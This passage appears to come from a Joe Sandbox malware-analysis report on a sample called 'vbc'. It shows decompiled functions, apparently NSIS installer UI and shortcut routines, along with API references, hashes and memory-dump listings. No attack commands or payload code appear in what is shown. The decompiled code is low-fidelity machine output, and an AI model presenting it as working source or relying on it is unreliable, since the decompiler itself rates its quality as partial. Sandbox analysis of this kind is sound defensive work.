                      • Part of subcall function 004067A1: CharNextW.USER32(?), ref: 00406804
                      • Part of subcall function 004067A1: CharNextW.USER32(?), ref: 00406813
                      • Part of subcall function 004067A1: CharNextW.USER32(?), ref: 00406818
                      • Part of subcall function 004067A1: CharPrevW.USER32(?,?), ref: 0040682B
                    • GetDiskFreeSpaceW.KERNEL32(0079FF18,?,?,0000040F,?,0079FF18,0079FF18,?,00000001,0079FF18,?,?,000003FB,?), ref: 00404BAF
                    • MulDiv.KERNEL32 ref: 00404BCA
                      • Part of subcall function 00404D23: lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DC4
                      • Part of subcall function 00404D23: wsprintfW.USER32 ref: 00404DCD
                      • Part of subcall function 00404D23: SetDlgItemTextW.USER32 ref: 00404DE0
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                    • String ID: A$Call
                    • API String ID: 2624150263-209694386
                    • Opcode ID: 18688f4ff942e0cd0688df8116ebccbb4873b9e7479cc5ca6d046e93a4f243ee
                    • Instruction ID: 86dd0b9b094f85dab2cef093751cf510b28304c980c81074e8bd76ad65710a38
                    • Opcode Fuzzy Hash: 18688f4ff942e0cd0688df8116ebccbb4873b9e7479cc5ca6d046e93a4f243ee
                    • Instruction Fuzzy Hash: 4DA190B1901208ABDB11EFA5CD45AEF77B8EF84314F11803BF601B62D1DB7C9A418B69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 67%
                    			E004021AA(void* __eflags) {
                    				signed int _t52;
                    				void* _t56;
                    				intOrPtr* _t60;
                    				intOrPtr _t61;
                    				intOrPtr* _t62;
                    				intOrPtr* _t64;
                    				intOrPtr* _t66;
                    				intOrPtr* _t68;
                    				intOrPtr* _t70;
                    				intOrPtr* _t72;
                    				intOrPtr* _t74;
                    				intOrPtr* _t76;
                    				intOrPtr* _t78;
                    				intOrPtr* _t80;
                    				void* _t83;
                    				intOrPtr* _t91;
                    				signed int _t101;
                    				signed int _t105;
                    				void* _t107;
                    
                    				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                    				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                    				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                    				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                    				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                    				_t52 =  *(_t107 - 0x20);
                    				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                    				_t101 = _t52 & 0x00008000;
                    				_t105 = _t52 >> 0x0000000c & 0x00000007;
                    				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                    				if(E00405E60( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                    					E00402DA6(0x21);
                    				}
                    				_t56 = _t107 + 8;
                    				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                    				if(_t56 < _t83) {
                    					L14:
                    					 *((intOrPtr*)(_t107 - 4)) = 1;
                    					_push(0xfffffff0);
                    				} else {
                    					_t60 =  *((intOrPtr*)(_t107 + 8));
                    					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                    					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                    					if(_t61 >= _t83) {
                    						_t64 =  *((intOrPtr*)(_t107 + 8));
                    						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                    						if(_t101 == _t83) {
                    							_t80 =  *((intOrPtr*)(_t107 + 8));
                    							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x7b4000);
                    						}
                    						if(_t105 != _t83) {
                    							_t78 =  *((intOrPtr*)(_t107 + 8));
                    							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                    						}
                    						_t66 =  *((intOrPtr*)(_t107 + 8));
                    						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                    						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                    						if( *_t91 != _t83) {
                    							_t76 =  *((intOrPtr*)(_t107 + 8));
                    							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                    						}
                    						_t68 =  *((intOrPtr*)(_t107 + 8));
                    						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                    						_t70 =  *((intOrPtr*)(_t107 + 8));
                    						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                    						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                    							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                    							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                    						}
                    						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                    						 *((intOrPtr*)( *_t72 + 8))(_t72);
                    					}
                    					_t62 =  *((intOrPtr*)(_t107 + 8));
                    					 *((intOrPtr*)( *_t62 + 8))(_t62);
                    					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                    						_push(0xfffffff4);
                    					} else {
                    						goto L14;
                    					}
                    				}
                    				E00401423();
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t107 - 4));
                    				return 0;
			}

                    0x004021b3
                    0x004021bd
                    0x004021c7
                    0x004021d1
                    0x004021dc
                    0x004021df
                    0x004021f9
                    0x004021fc
                    0x00402202
                    0x00402205
                    0x0040220f
                    0x00402213
                    0x00402213
                    0x00402218
                    0x00402229
                    0x00402231
                    0x004022e8
                    0x004022e8
                    0x004022ef
                    0x00402237
                    0x00402237
                    0x00402246
                    0x0040224a
                    0x0040224d
                    0x00402253
                    0x00402261
                    0x00402264
                    0x00402266
                    0x00402271
                    0x00402271
                    0x00402276
                    0x00402278
                    0x0040227f
                    0x0040227f
                    0x00402282
                    0x0040228b
                    0x0040228e
                    0x00402294
                    0x00402296
                    0x004022a0
                    0x004022a0
                    0x004022a3
                    0x004022ac
                    0x004022af
                    0x004022b8
                    0x004022be
                    0x004022c0
                    0x004022ce
                    0x004022ce
                    0x004022d1
                    0x004022d7
                    0x004022d7
                    0x004022da
                    0x004022e0
                    0x004022e6
                    0x004022fb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004022e6
                    0x004022f1
                    0x00402c2d
                    0x00402c39

                    APIs
                    • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?), ref: 00402229
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CreateInstance
                    • String ID:
                    • API String ID: 542301482-0
                    • Opcode ID: b0b822540a1f8e9f15e50715e8c4ec56282f12879c6d9eab3f74b311f962a689
                    • Instruction ID: 703d758d197f09623ff28e3c758b152e072eb06d6e5445e6f92684eec68365f7
                    • Opcode Fuzzy Hash: b0b822540a1f8e9f15e50715e8c4ec56282f12879c6d9eab3f74b311f962a689
                    • Instruction Fuzzy Hash: 47412571A00209EFCF40DFE4C989E9D7BB5BF49344B2045AAF505EB2D1DB799981CB84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 39%
                    			E0040290B(short __ebx, short* __edi) {
                    				void* _t21;
                    
                    				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                    					E00406461( *((intOrPtr*)(_t21 - 0xc)), _t8);
                    					_push(_t21 - 0x2b0);
                    					_push(__edi);
                    					E0040651A();
                    				} else {
                    					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                    					 *__edi = __ebx;
                    					 *((intOrPtr*)(_t21 - 4)) = 1;
                    				}
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t21 - 4));
                    				return 0;
			}

                    0x00402923
                    0x0040293e
                    0x00402949
                    0x0040294a
                    0x00402a94
                    0x00402925
                    0x00402928
                    0x0040292b
                    0x0040292e
                    0x0040292e
                    0x00402c2d
                    0x00402c39

                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: FileFindFirst
                    • String ID:
                    • API String ID: 1974802433-0
                    • Opcode ID: 1e85ad8e298d533372e236d13d1dc995d53f22f379fc750621e13dcefc93ed24
                    • Instruction ID: 12288428410ef0014967daf25a5ca188ca533e908051b72e28feae2455f0dfde
                    • Opcode Fuzzy Hash: 1e85ad8e298d533372e236d13d1dc995d53f22f379fc750621e13dcefc93ed24
                    • Instruction Fuzzy Hash: A6F05E71904114EED701DBA4D949AAEB378EF55318F20857BE101F21D0EBB88E119B2A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E00404EE3(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                    				struct HWND__* _v8;
                    				struct HWND__* _v12;
                    				long _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				intOrPtr _v28;
                    				signed char* _v32;
                    				int _v36;
                    				signed int _v44;
                    				int _v48;
                    				signed int* _v60;
                    				signed char* _v64;
                    				signed int _v68;
                    				long _v72;
                    				void* _v76;
                    				intOrPtr _v80;
                    				intOrPtr _v84;
                    				void* _v88;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t198;
                    				intOrPtr _t201;
                    				long _t207;
                    				signed int _t211;
                    				signed int _t222;
                    				void* _t225;
                    				void* _t226;
                    				int _t232;
                    				long _t237;
                    				long _t238;
                    				signed int _t239;
                    				signed int _t245;
                    				signed int _t247;
                    				signed char _t248;
                    				signed char _t254;
                    				void* _t258;
                    				void* _t260;
                    				signed char* _t278;
                    				signed char _t279;
                    				long _t284;
                    				struct HWND__* _t291;
                    				signed int* _t292;
                    				int _t293;
                    				long _t294;
                    				signed int _t295;
                    				void* _t297;
                    				long _t298;
                    				int _t299;
                    				signed int _t300;
                    				signed int _t303;
                    				signed int _t311;
                    				signed char* _t319;
                    				int _t324;
                    				void* _t326;
                    
                    				_t291 = _a4;
                    				_v12 = GetDlgItem(_t291, 0x3f9);
                    				_v8 = GetDlgItem(_t291, 0x408);
                    				_t326 = SendMessageW;
                    				_v24 =  *0x7a8a88;
                    				_v28 =  *0x7a8a70 + 0x94;
                    				if(_a8 != 0x110) {
                    					L23:
                    					if(_a8 != 0x405) {
                    						_t301 = _a16;
                    					} else {
                    						_a12 = 0;
                    						_t301 = 1;
                    						_a8 = 0x40f;
                    						_a16 = 1;
                    					}
                    					if(_a8 == 0x4e || _a8 == 0x413) {
                    						_v16 = _t301;
                    						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                    							if(( *0x7a8a79 & 0x00000002) != 0) {
                    								L41:
                    								if(_v16 != 0) {
                    									_t237 = _v16;
                    									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                    										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                    									}
                    									_t238 = _v16;
                    									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                    										_t301 = _v24;
                    										_t239 =  *(_t238 + 0x5c);
                    										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                    											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                    										} else {
                    											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                    										}
                    									}
                    								}
                    								goto L48;
                    							}
                    							if(_a8 == 0x413) {
                    								L33:
                    								_t301 = 0 | _a8 != 0x00000413;
                    								_t245 = E00404E31(_v8, _a8 != 0x413);
                    								_t295 = _t245;
                    								if(_t295 >= 0) {
                    									_t94 = _v24 + 8; // 0x8
                    									_t301 = _t245 * 0x818 + _t94;
                    									_t247 =  *_t301;
                    									if((_t247 & 0x00000010) == 0) {
                    										if((_t247 & 0x00000040) == 0) {
                    											_t248 = _t247 ^ 0x00000001;
                    										} else {
                    											_t254 = _t247 ^ 0x00000080;
                    											if(_t254 >= 0) {
                    												_t248 = _t254 & 0x000000fe;
                    											} else {
                    												_t248 = _t254 | 0x00000001;
                    											}
                    										}
                    										 *_t301 = _t248;
                    										E0040117D(_t295);
                    										_a12 = _t295 + 1;
                    										_a16 =  !( *0x7a8a78) >> 0x00000008 & 0x00000001;
                    										_a8 = 0x40f;
                    									}
                    								}
                    								goto L41;
                    							}
                    							_t301 = _a16;
                    							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                    								goto L41;
                    							}
                    							goto L33;
                    						} else {
                    							goto L48;
                    						}
                    					} else {
                    						L48:
                    						if(_a8 != 0x111) {
                    							L56:
                    							if(_a8 == 0x200) {
                    								SendMessageW(_v8, 0x200, 0, 0);
                    							}
                    							if(_a8 == 0x40b) {
                    								_t225 =  *0x7a1f2c;
                    								if(_t225 != 0) {
                    									ImageList_Destroy(_t225);
                    								}
                    								_t226 =  *0x7a1f40;
                    								if(_t226 != 0) {
                    									GlobalFree(_t226);
                    								}
                    								 *0x7a1f2c = 0;
                    								 *0x7a1f40 = 0;
                    								 *0x7a8ac0 = 0;
                    							}
                    							if(_a8 != 0x40f) {
                    								L90:
                    								if(_a8 == 0x420 && ( *0x7a8a79 & 0x00000001) != 0) {
                    									_t324 = (0 | _a16 == 0x00000020) << 3;
                    									ShowWindow(_v8, _t324);
                    									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                    								}
                    								goto L93;
                    							} else {
                    								E004011EF(_t301, 0, 0);
                    								_t198 = _a12;
                    								if(_t198 != 0) {
                    									if(_t198 != 0xffffffff) {
                    										_t198 = _t198 - 1;
                    									}
                    									_push(_t198);
                    									_push(8);
                    									E00404EB1();
                    								}
                    								if(_a16 == 0) {
                    									L75:
                    									E004011EF(_t301, 0, 0);
                    									_v36 =  *0x7a1f40;
                    									_t201 =  *0x7a8a88;
                    									_v64 = 0xf030;
                    									_v24 = 0;
                    									if( *0x7a8a8c <= 0) {
                    										L86:
                    										if( *0x7a8b1e == 0x400) {
                    											InvalidateRect(_v8, 0, 1);
                    										}
                    										if( *((intOrPtr*)( *0x7a7a3c + 0x10)) != 0) {
                    											E00404DEC(0x3ff, 0xfffffffb, E00404E04(5));
                    										}
                    										goto L90;
                    									}
                    									_t292 = _t201 + 8;
                    									do {
                    										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                    										if(_t207 != 0) {
                    											_t303 =  *_t292;
                    											_v72 = _t207;
                    											_v76 = 8;
                    											if((_t303 & 0x00000001) != 0) {
                    												_v76 = 9;
                    												_v60 =  &(_t292[4]);
                    												_t292[0] = _t292[0] & 0x000000fe;
                    											}
                    											if((_t303 & 0x00000040) == 0) {
                    												_t211 = (_t303 & 0x00000001) + 1;
                    												if((_t303 & 0x00000010) != 0) {
                    													_t211 = _t211 + 3;
                    												}
                    											} else {
                    												_t211 = 3;
                    											}
                    											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                    											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                    											SendMessageW(_v8, 0x113f, 0,  &_v76);
                    										}
                    										_v24 = _v24 + 1;
                    										_t292 =  &(_t292[0x206]);
                    									} while (_v24 <  *0x7a8a8c);
                    									goto L86;
                    								} else {
                    									_t293 = E004012E2( *0x7a1f40);
                    									E00401299(_t293);
                    									_t222 = 0;
                    									_t301 = 0;
                    									if(_t293 <= 0) {
                    										L74:
                    										SendMessageW(_v12, 0x14e, _t301, 0);
                    										_a16 = _t293;
                    										_a8 = 0x420;
                    										goto L75;
                    									} else {
                    										goto L71;
                    									}
                    									do {
                    										L71:
                    										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                    											_t301 = _t301 + 1;
                    										}
                    										_t222 = _t222 + 1;
                    									} while (_t222 < _t293);
                    									goto L74;
                    								}
                    							}
                    						}
                    						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                    							goto L93;
                    						} else {
                    							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                    							if(_t232 == 0xffffffff) {
                    								goto L93;
                    							}
                    							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                    							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                    								_t294 = 0x20;
                    							}
                    							E00401299(_t294);
                    							SendMessageW(_a4, 0x420, 0, _t294);
                    							_a12 = _a12 | 0xffffffff;
                    							_a16 = 0;
                    							_a8 = 0x40f;
                    							goto L56;
                    						}
                    					}
                    				} else {
                    					_v36 = 0;
                    					_v20 = 2;
                    					 *0x7a8ac0 = _t291;
                    					 *0x7a1f40 = GlobalAlloc(0x40,  *0x7a8a8c << 2);
                    					_t258 = LoadImageW( *0x7a8a60, 0x6e, 0, 0, 0, 0);
                    					 *0x7a1f34 =  *0x7a1f34 | 0xffffffff;
                    					_t297 = _t258;
                    					 *0x7a1f3c = SetWindowLongW(_v8, 0xfffffffc, E004054F0);
                    					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                    					 *0x7a1f2c = _t260;
                    					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                    					SendMessageW(_v8, 0x1109, 2,  *0x7a1f2c);
                    					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                    						SendMessageW(_v8, 0x111b, 0x10, 0);
                    					}
                    					DeleteObject(_t297);
                    					_t298 = 0;
                    					do {
                    						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                    						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                    							if(_t298 != 0x20) {
                    								_v20 = 0;
                    							}
                    							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406557(_t298, 0, _t326, 0, _t266)), _t298);
                    						}
                    						_t298 = _t298 + 1;
                    					} while (_t298 < 0x21);
                    					_t299 = _a16;
                    					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                    					_push(0x15);
                    					E00404476(_a4);
                    					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                    					_push(0x16);
                    					E00404476(_a4);
                    					_t300 = 0;
                    					_v16 = 0;
                    					if( *0x7a8a8c <= 0) {
                    						L19:
                    						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                    						goto L20;
                    					} else {
                    						_t319 = _v24 + 8;
                    						_v32 = _t319;
                    						do {
                    							_t278 =  &(_t319[0x10]);
                    							if( *_t278 != 0) {
                    								_v64 = _t278;
                    								_t279 =  *_t319;
                    								_v88 = _v16;
                    								_t311 = 0x20;
                    								_v84 = 0xffff0002;
                    								_v80 = 0xd;
                    								_v68 = _t311;
                    								_v44 = _t300;
                    								_v72 = _t279 & _t311;
                    								if((_t279 & 0x00000002) == 0) {
                    									if((_t279 & 0x00000004) == 0) {
                    										 *( *0x7a1f40 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                    									} else {
                    										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                    									}
                    								} else {
                    									_v80 = 0x4d;
                    									_v48 = 1;
                    									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                    									_v36 = 1;
                    									 *( *0x7a1f40 + _t300 * 4) = _t284;
                    									_v16 =  *( *0x7a1f40 + _t300 * 4);
                    								}
                    							}
                    							_t300 = _t300 + 1;
                    							_t319 =  &(_v32[0x818]);
                    							_v32 = _t319;
                    						} while (_t300 <  *0x7a8a8c);
                    						if(_v36 != 0) {
                    							L20:
                    							if(_v20 != 0) {
                    								E004044AB(_v8);
                    								goto L23;
                    							} else {
                    								ShowWindow(_v12, 5);
                    								E004044AB(_v12);
                    								L93:
                    								return E004044DD(_a8, _a12, _a16);
                    							}
                    						}
                    						goto L19;
                    					}
                    				}
			}

                    0x00404eea
                    0x00404f03
                    0x00404f08
                    0x00404f10
                    0x00404f16
                    0x00404f2c
                    0x00404f2f
                    0x0040515a
                    0x00405161
                    0x00405175
                    0x00405163
                    0x00405165
                    0x00405168
                    0x00405169
                    0x00405170
                    0x00405170
                    0x00405181
                    0x0040518f
                    0x00405192
                    0x004051a8
                    0x0040521d
                    0x00405220
                    0x00405222
                    0x0040522c
                    0x0040523a
                    0x0040523a
                    0x0040523c
                    0x00405246
                    0x0040524c
                    0x0040524f
                    0x00405252
                    0x0040526d
                    0x00405254
                    0x0040525e
                    0x0040525e
                    0x00405252
                    0x00405246
                    0x00000000
                    0x00405220
                    0x004051ad
                    0x004051b8
                    0x004051bd
                    0x004051c4
                    0x004051c9
                    0x004051cd
                    0x004051d8
                    0x004051d8
                    0x004051dc
                    0x004051e0
                    0x004051e4
                    0x004051f7
                    0x004051e6
                    0x004051e6
                    0x004051ed
                    0x004051f3
                    0x004051ef
                    0x004051ef
                    0x004051ef
                    0x004051ed
                    0x004051fb
                    0x004051fd
                    0x00405210
                    0x00405213
                    0x00405216
                    0x00405216
                    0x004051e0
                    0x00000000
                    0x004051cd
                    0x004051af
                    0x004051b6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405270
                    0x00405270
                    0x00405277
                    0x004052e8
                    0x004052f0
                    0x004052f8
                    0x004052f8
                    0x00405301
                    0x00405303
                    0x0040530a
                    0x0040530d
                    0x0040530d
                    0x00405313
                    0x0040531a
                    0x0040531d
                    0x0040531d
                    0x00405323
                    0x00405329
                    0x0040532f
                    0x0040532f
                    0x0040533c
                    0x0040549d
                    0x004054a4
                    0x004054c1

                    APIs
                    • GetDlgItem.USER32(?,000003F9), ref: 00404EFB
                    • GetDlgItem.USER32(?,00000408), ref: 00404F06
                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F50
                    • LoadImageW.USER32 ref: 00404F67
                    • SetWindowLongW.USER32 ref: 00404F80
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F94
                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FA6
                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404FBC
                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FC8
                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FDA
                    • DeleteObject.GDI32(00000000), ref: 00404FDD
                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405008
                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405014
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050AF
                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050DF
                      • Part of subcall function 004044AB: SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F3
                    • GetWindowLongW.USER32(?,000000F0), ref: 00405121
                    • SetWindowLongW.USER32 ref: 0040512F
                    • ShowWindow.USER32(?,00000005), ref: 0040513F
                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040523A
                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040529F
                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052B4
                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052D8
                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052F8
                    • ImageList_Destroy.COMCTL32(?), ref: 0040530D
                    • GlobalFree.KERNEL32(?), ref: 0040531D
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405396
                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040543F
                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040544E
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00405479
                    • ShowWindow.USER32(?,00000000), ref: 004054C7
                    • GetDlgItem.USER32(?,000003FE), ref: 004054D2
                    • ShowWindow.USER32(00000000), ref: 004054D9
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
